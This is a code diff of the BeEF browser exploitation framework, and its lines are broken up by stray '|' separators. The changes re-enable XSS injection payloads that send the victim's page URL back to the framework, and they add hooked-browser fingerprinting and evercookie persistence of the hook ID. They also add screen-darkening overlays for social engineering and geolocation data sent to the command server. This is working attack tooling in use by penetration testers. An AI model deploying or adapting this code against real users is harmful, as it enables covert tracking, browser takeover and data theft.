if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
|
||||
}catch(e){
|
||||
// the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
|
||||
// and there is no reason to read cookies at this point
|
||||
details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
|
||||
details["hasSessionCookies"] = "No";
|
||||
details["hasPersistentCookies"] = "No";
|
||||
details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
|
||||
details['hasSessionCookies'] = "No";
|
||||
details['hasPersistentCookies'] = "No";
|
||||
}
|
||||
|
||||
if (browser_name) details["BrowserName"] = browser_name;
|
||||
if (browser_version) details["BrowserVersion"] = browser_version;
|
||||
if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
|
||||
if (page_title) details["PageTitle"] = page_title;
|
||||
if (page_uri) details["PageURI"] = page_uri;
|
||||
if (page_referrer) details["PageReferrer"] = page_referrer;
|
||||
if (hostname) details["HostName"] = hostname;
|
||||
if (hostport) details["HostPort"] = hostport;
|
||||
if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
|
||||
if (browser_name) details['BrowserName'] = browser_name;
|
||||
if (browser_version) details['BrowserVersion'] = browser_version;
|
||||
if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
|
||||
if (page_title) details['PageTitle'] = page_title;
|
||||
if (page_uri) details['PageURI'] = page_uri;
|
||||
if (page_referrer) details['PageReferrer'] = page_referrer;
|
||||
if (hostname) details['HostName'] = hostname;
|
||||
if (hostport) details['HostPort'] = hostport;
|
||||
if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
|
||||
if (os_name) details['OsName'] = os_name;
|
||||
if (hw_name) details['Hardware'] = hw_name;
|
||||
if (cpu_type) details['CPU'] = cpu_type;
|
||||
@@ -1503,11 +1703,12 @@ beef.browser = {
|
||||
if (screen_size) details['ScreenSize'] = screen_size;
|
||||
if (window_size) details['WindowSize'] = window_size;
|
||||
if (java_enabled) details['JavaEnabled'] = java_enabled;
|
||||
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
|
||||
if (has_flash) details['HasFlash'] = has_flash
|
||||
if (has_phonegap) details['HasPhonegap'] = has_phonegap
|
||||
if (has_web_socket) details['HasWebSocket'] = has_web_socket
|
||||
if (has_googlegears) details['HasGoogleGears'] = has_googlegears
|
||||
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
|
||||
if (has_flash) details['HasFlash'] = has_flash;
|
||||
if (has_phonegap) details['HasPhonegap'] = has_phonegap;
|
||||
if (has_web_socket) details['HasWebSocket'] = has_web_socket;
|
||||
if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
|
||||
if (has_webrtc) details['HasWebRTC'] = has_webrtc;
|
||||
if (has_activex) details['HasActiveX'] = has_activex;
|
||||
if (has_silverlight) details['HasSilverlight'] = has_silverlight;
|
||||
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
|
||||
@@ -1526,6 +1727,13 @@ beef.browser = {
|
||||
return !!window.ActiveXObject;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns boolean value depending on whether the browser supports WebRTC
|
||||
*/
|
||||
hasWebRTC:function () {
|
||||
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns boolean value depending on whether the browser supports Silverlight
|
||||
*/
|
||||
|
||||
@@ -76,6 +76,30 @@ beef.dom = {
|
||||
|
||||
return iframe;
|
||||
},
|
||||
|
||||
/**
|
||||
* Returns the highest current z-index
|
||||
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
|
||||
* @return: {Integer} Highest z-index in the DOM
|
||||
* OR
|
||||
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
|
||||
*/
|
||||
getHighestZindex: function(include_id) {
|
||||
var highest = {'height':0, 'elem':''};
|
||||
$j('*').each(function() {
|
||||
var current_high = parseInt($j(this).css("zIndex"),10);
|
||||
if (current_high > highest.height) {
|
||||
highest.height = current_high;
|
||||
highest.elem = $j(this).attr('id');
|
||||
}
|
||||
});
|
||||
|
||||
if (include_id) {
|
||||
return highest;
|
||||
} else {
|
||||
return highest.height;
|
||||
}
|
||||
},
|
||||
|
||||
/**
|
||||
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
|
||||
@@ -95,8 +119,15 @@ beef.dom = {
|
||||
var form_action = params['src'];
|
||||
params['src'] = '';
|
||||
}
|
||||
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
|
||||
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
|
||||
if (type == 'hidden') {
|
||||
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
|
||||
} else if (type == 'fullscreen') {
|
||||
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
|
||||
$j('body').css({'padding':'0px', 'margin':'0px'});
|
||||
} else {
|
||||
css = styles;
|
||||
$j('body').css({'padding':'0px', 'margin':'0px'});
|
||||
}
|
||||
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
|
||||
|
||||
if (form_submit && form_action)
|
||||
@@ -127,6 +158,75 @@ beef.dom = {
|
||||
}
|
||||
});
|
||||
},
|
||||
|
||||
/**
|
||||
* Load a full screen div that is black, or, transparent
|
||||
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
|
||||
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
|
||||
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
|
||||
* // By default this is 70
|
||||
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
|
||||
* // By default this will use beef.dom.getHighestZindex to always go to the top
|
||||
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
|
||||
* // By default this is #000000
|
||||
*/
|
||||
grayOut: function(vis, options) {
|
||||
// in any order. Pass only the properties you need to set.
|
||||
var options = options || {};
|
||||
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
|
||||
var opacity = options.opacity || 70;
|
||||
var opaque = (opacity / 100);
|
||||
var bgcolor = options.bgcolor || '#000000';
|
||||
var dark=document.getElementById('darkenScreenObject');
|
||||
if (!dark) {
|
||||
// The dark layer doesn't exist, it's never been created. So we'll
|
||||
// create it here and apply some basic styles.
|
||||
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
|
||||
var tbody = document.getElementsByTagName("body")[0];
|
||||
var tnode = document.createElement('div'); // Create the layer.
|
||||
tnode.style.position='absolute'; // Position absolutely
|
||||
tnode.style.top='0px'; // In the top
|
||||
tnode.style.left='0px'; // Left corner of the page
|
||||
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
|
||||
tnode.style.display='none'; // Start out Hidden
|
||||
tnode.id='darkenScreenObject'; // Name it so we can find it later
|
||||
tbody.appendChild(tnode); // Add it to the web page
|
||||
dark=document.getElementById('darkenScreenObject'); // Get the object.
|
||||
}
|
||||
if (vis) {
|
||||
// Calculate the page width and height
|
||||
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
|
||||
var pageWidth = document.body.scrollWidth+'px';
|
||||
var pageHeight = document.body.scrollHeight+'px';
|
||||
} else if( document.body.offsetWidth ) {
|
||||
var pageWidth = document.body.offsetWidth+'px';
|
||||
var pageHeight = document.body.offsetHeight+'px';
|
||||
} else {
|
||||
var pageWidth='100%';
|
||||
var pageHeight='100%';
|
||||
}
|
||||
//set the shader to cover the entire page and make it visible.
|
||||
dark.style.opacity=opaque;
|
||||
dark.style.MozOpacity=opaque;
|
||||
dark.style.filter='alpha(opacity='+opacity+')';
|
||||
dark.style.zIndex=zindex;
|
||||
dark.style.backgroundColor=bgcolor;
|
||||
dark.style.width= pageWidth;
|
||||
dark.style.height= pageHeight;
|
||||
dark.style.display='block';
|
||||
} else {
|
||||
dark.style.display='none';
|
||||
}
|
||||
},
|
||||
|
||||
/**
|
||||
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
|
||||
* or, re-writing a document this is useful.
|
||||
*/
|
||||
removeStylesheets: function() {
|
||||
$j('link[rel=stylesheet]').remove();
|
||||
$j('style').remove();
|
||||
},
|
||||
|
||||
/**
|
||||
* Create a form element with the specified parameters, appending it to the DOM if append == true
|
||||
@@ -292,7 +392,7 @@ beef.dom = {
|
||||
}
|
||||
content += "</object>";
|
||||
}
|
||||
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
|
||||
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
|
||||
|
||||
if (codebase != null) {
|
||||
content = "" +
|
||||
@@ -311,24 +411,25 @@ beef.dom = {
|
||||
}
|
||||
content += "</applet>";
|
||||
}
|
||||
if (beef.browser.isFF()) {
|
||||
if (codebase != null) {
|
||||
content = "" +
|
||||
"<embed id='" + id + "' code='" + code + "' " +
|
||||
"type='application/x-java-applet' codebase='" + codebase + "' " +
|
||||
"height='0' width='0' name='" + name + "'>";
|
||||
} else {
|
||||
content = "" +
|
||||
"<embed id='" + id + "' code='" + code + "' " +
|
||||
"type='application/x-java-applet' archive='" + archive + "' " +
|
||||
"height='0' width='0' name='" + name + "'>";
|
||||
}
|
||||
|
||||
if (params != null) {
|
||||
content += beef.dom.parseAppletParams(params);
|
||||
}
|
||||
content += "</embed>";
|
||||
}
|
||||
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
|
||||
// if (beef.browser.isFF()) {
|
||||
// if (codebase != null) {
|
||||
// content = "" +
|
||||
// "<embed id='" + id + "' code='" + code + "' " +
|
||||
// "type='application/x-java-applet' codebase='" + codebase + "' " +
|
||||
// "height='0' width='0' name='" + name + "'>";
|
||||
// } else {
|
||||
// content = "" +
|
||||
// "<embed id='" + id + "' code='" + code + "' " +
|
||||
// "type='application/x-java-applet' archive='" + archive + "' " +
|
||||
// "height='0' width='0' name='" + name + "'>";
|
||||
// }
|
||||
//
|
||||
// if (params != null) {
|
||||
// content += beef.dom.parseAppletParams(params);
|
||||
// }
|
||||
// content += "</embed>";
|
||||
// }
|
||||
$j('body').append(content);
|
||||
},
|
||||
|
||||
@@ -375,11 +476,11 @@ beef.dom = {
|
||||
* @params: {String} rport: remote port
|
||||
* @params: {String} commands: protocol commands to be executed by the remote host:port service
|
||||
*/
|
||||
createIframeIpecForm: function(rhost, rport, commands){
|
||||
createIframeIpecForm: function(rhost, rport, path, commands){
|
||||
var iframeIpec = beef.dom.createInvisibleIframe();
|
||||
|
||||
var formIpec = document.createElement('form');
|
||||
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
|
||||
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
|
||||
formIpec.setAttribute('method', 'POST');
|
||||
formIpec.setAttribute('enctype', 'multipart/form-data');
|
||||
|
||||
|
||||
@@ -32,14 +32,14 @@ beef.geolocation = {
|
||||
|
||||
$j.ajax({
|
||||
error: function(xhr, status, error){
|
||||
//console.log("[geolocation.js] openstreetmap error");
|
||||
beef.debug("[geolocation.js] openstreetmap error");
|
||||
beef.net.send(command_url, command_id, "latitude=" + latitude
|
||||
+ "&longitude=" + longitude
|
||||
+ "&osm=UNAVAILABLE"
|
||||
+ "&geoLocEnabled=True");
|
||||
},
|
||||
success: function(data, status, xhr){
|
||||
//console.log("[geolocation.js] openstreetmap success");
|
||||
beef.debug("[geolocation.js] openstreetmap success");
|
||||
var jsonResp = $j.parseJSON(data);
|
||||
|
||||
beef.net.send(command_url, command_id, "latitude=" + latitude
|
||||
@@ -64,16 +64,16 @@ beef.geolocation = {
|
||||
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
|
||||
return;
|
||||
}
|
||||
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
|
||||
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
|
||||
navigator.geolocation.getCurrentPosition( //note: this is an async call
|
||||
function(position){ // success
|
||||
var latitude = position.coords.latitude;
|
||||
var longitude = position.coords.longitude;
|
||||
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
|
||||
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
|
||||
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
|
||||
|
||||
}, function(error){ // failure
|
||||
//console.log("[geolocation.js] error [%d] getting position", error.code);
|
||||
beef.debug("[geolocation.js] error [%d] getting position", error.code);
|
||||
switch(error.code) // Returns 0-3
|
||||
{
|
||||
case 0:
|
||||
|
||||
@@ -126,4 +126,4 @@ beef.hardware = {
|
||||
}
|
||||
};
|
||||
|
||||
beef.regCmp('beef.net.hardware');
|
||||
beef.regCmp('beef.hardware');
|
||||
|
||||
@@ -13,7 +13,8 @@
|
||||
* and will have a new session id. The new session id will need to know
|
||||
* the brwoser details. So sendback the browser details again.
|
||||
*/
|
||||
BEEFHOOK = beef.session.get_hook_session_id();
|
||||
|
||||
beef.session.get_hook_session_id();
|
||||
|
||||
if (beef.pageIsLoaded) {
|
||||
beef.net.browser_details();
|
||||
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
|
||||
try {
|
||||
callback(event);
|
||||
} catch (e) {
|
||||
console.log("window.onpopstate - couldn't execute callback: " + e.message);
|
||||
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
@@ -46,7 +47,7 @@ window.onclose = function (event) {
|
||||
try {
|
||||
callback(event);
|
||||
} catch (e) {
|
||||
console.log("window.onclose - couldn't execute callback: " + e.message);
|
||||
beef.debug("window.onclose - couldn't execute callback: " + e.message);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
@@ -43,7 +43,7 @@ beef.net.dns = {
|
||||
|
||||
// sends a DNS request
|
||||
sendQuery = function(query) {
|
||||
//console.log("Requesting: "+query);
|
||||
beef.debug("Requesting: "+query);
|
||||
var img = new Image;
|
||||
img.src = "http://"+query;
|
||||
img.onload = function() { dom.removeChild(this); }
|
||||
|
||||
@@ -49,22 +49,20 @@ beef.net.xssrays = {
|
||||
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
|
||||
vectors: [
|
||||
|
||||
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
|
||||
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
|
||||
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
|
||||
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
|
||||
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
|
||||
@@ -107,7 +105,7 @@ beef.net.xssrays = {
|
||||
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
|
||||
printDebug:function(log) {
|
||||
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
|
||||
console.log("[XssRays] " + log);
|
||||
beef.debug("[XssRays] " + log);
|
||||
}
|
||||
},
|
||||
|
||||
@@ -340,8 +338,8 @@ beef.net.xssrays = {
|
||||
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
|
||||
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
|
||||
|
||||
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
|
||||
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
|
||||
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
|
||||
exploit = vector.input.replace(/XSS/g, beefCallback);
|
||||
|
||||
@@ -368,7 +366,7 @@ beef.net.xssrays = {
|
||||
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
|
||||
|
||||
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
|
||||
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
|
||||
exploit = vector.input.replace(/XSS/g, beefCallback);
|
||||
|
||||
@@ -424,7 +422,7 @@ beef.net.xssrays = {
|
||||
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
|
||||
|
||||
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
|
||||
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
|
||||
|
||||
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
|
||||
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
|
||||
|
||||
@@ -13,7 +13,8 @@ beef.session = {
|
||||
|
||||
hook_session_id_length: 80,
|
||||
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
|
||||
ec: new evercookie(),
|
||||
ec: new evercookie(),
|
||||
beefhook: "<%= @hook_session_name %>",
|
||||
|
||||
/**
|
||||
* Gets a string which will be used to identify the hooked browser session
|
||||
@@ -22,12 +23,12 @@ beef.session = {
|
||||
*/
|
||||
get_hook_session_id: function() {
|
||||
// check if the browser is already known to the framework
|
||||
var id = this.ec.evercookie_cookie("BEEFHOOK");
|
||||
var id = this.ec.evercookie_cookie(beef.session.beefhook);
|
||||
if (typeof id == 'undefined') {
|
||||
var id = this.ec.evercookie_userdata("BEEFHOOK");
|
||||
var id = this.ec.evercookie_userdata(beef.session.beefhook);
|
||||
}
|
||||
if (typeof id == 'undefined') {
|
||||
var id = this.ec.evercookie_window("BEEFHOOK");
|
||||
var id = this.ec.evercookie_window(beef.session.beefhook);
|
||||
}
|
||||
|
||||
// if the browser is not known create a hook session id and set it
|
||||
@@ -47,9 +48,9 @@ beef.session = {
|
||||
*/
|
||||
set_hook_session_id: function(id) {
|
||||
// persist the hook session id
|
||||
this.ec.evercookie_cookie("BEEFHOOK", id);
|
||||
this.ec.evercookie_userdata("BEEFHOOK", id);
|
||||
this.ec.evercookie_window("BEEFHOOK", id);
|
||||
this.ec.evercookie_cookie(beef.session.beefhook, id);
|
||||
this.ec.evercookie_userdata(beef.session.beefhook, id);
|
||||
this.ec.evercookie_window(beef.session.beefhook, id);
|
||||
},
|
||||
|
||||
/**
|
||||
|
||||
@@ -15,6 +15,7 @@ beef.updater = {
|
||||
|
||||
// XHR-polling timeout.
|
||||
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
|
||||
beefhook: "<%= @hook_session_name %>",
|
||||
|
||||
// A lock.
|
||||
lock: false,
|
||||
@@ -57,7 +58,7 @@ beef.updater = {
|
||||
get_commands: function() {
|
||||
try {
|
||||
this.lock = true;
|
||||
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
|
||||
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
|
||||
if (response.body != null && response.body.length > 0)
|
||||
beef.updater.execute_commands();
|
||||
});
|
||||
|
||||
@@ -34,8 +34,8 @@ module Constants
|
||||
HW_HTC_IMG = 'htc.ico'
|
||||
HW_MOTOROLA_UA_STR = 'motorola'
|
||||
HW_MOTOROLA_IMG = 'motorola.png'
|
||||
HW_GOOGLE_UA_STR = 'Nexus One'
|
||||
HE_GOOGLE_IM = 'nexus.png'
|
||||
HW_GOOGLE_UA_STR = 'Nexus'
|
||||
HW_GOOGLE_IMG = 'nexus.png'
|
||||
HW_ERICSSON_UA_STR = 'Ericsson'
|
||||
HW_ERICSSON_IMG = 'sony_ericsson.png'
|
||||
HW_ALL_UA_STR = 'All'
|
||||
|
||||
@@ -255,6 +255,14 @@ module BeEF
|
||||
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
|
||||
end
|
||||
|
||||
# get and store the yes|no value for HasWebRTC
|
||||
has_webrtc = get_param(@data['results'], 'HasWebRTC')
|
||||
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
|
||||
BD.set(session_id, 'HasWebRTC', has_webrtc)
|
||||
else
|
||||
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
|
||||
end
|
||||
|
||||
# get and store the yes|no value for HasActiveX
|
||||
has_activex = get_param(@data['results'], 'HasActiveX')
|
||||
if BeEF::Filters.is_valid_yes_no?(has_activex)
|
||||
|
||||
@@ -51,13 +51,18 @@ module Handlers
|
||||
|
||||
# @note is a known browser so send instructions
|
||||
else
|
||||
# @note Check if we haven't seen this browser for a while, log an event if we haven't
|
||||
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
|
||||
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
|
||||
end
|
||||
|
||||
# @note record the last poll from the browser
|
||||
hooked_browser.lastseen = Time.new.to_i
|
||||
|
||||
# @note Check for a change in zombie IP and log an event
|
||||
if config.get('beef.http.use_x_forward_for') == true
|
||||
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
|
||||
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
|
||||
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
|
||||
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
|
||||
end
|
||||
else
|
||||
|
||||
@@ -80,8 +80,9 @@ module BeEF
|
||||
# @note set the XHR-polling timeout
|
||||
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
|
||||
|
||||
# @note set the hook file path
|
||||
# @note set the hook file path and BeEF's cookie name
|
||||
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
|
||||
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
|
||||
|
||||
# @note if http_port <> public_port in config ini, use the public_port
|
||||
unless hook_session_config['beef_public_port'].nil?
|
||||
|
||||
@@ -80,6 +80,7 @@ module Models
|
||||
|
||||
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
|
||||
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
|
||||
@@ -91,7 +92,6 @@ module Models
|
||||
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
|
||||
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
|
||||
|
||||
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
|
||||
end
|
||||
|
||||
@@ -81,16 +81,34 @@ module BeEF
|
||||
case type
|
||||
when "apache"
|
||||
headers "Server" => "Apache/2.2.3 (CentOS)",
|
||||
"Content-Type" => "text/html"
|
||||
"Content-Type" => "text/html; charset=UTF-8"
|
||||
|
||||
when "iis"
|
||||
headers "Server" => "Microsoft-IIS/6.0",
|
||||
"X-Powered-By" => "ASP.NET",
|
||||
"Content-Type" => "text/html"
|
||||
"Content-Type" => "text/html; charset=UTF-8"
|
||||
else
|
||||
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
|
||||
end
|
||||
end
|
||||
|
||||
# @note If CORS are enabled, expose the appropriate headers
|
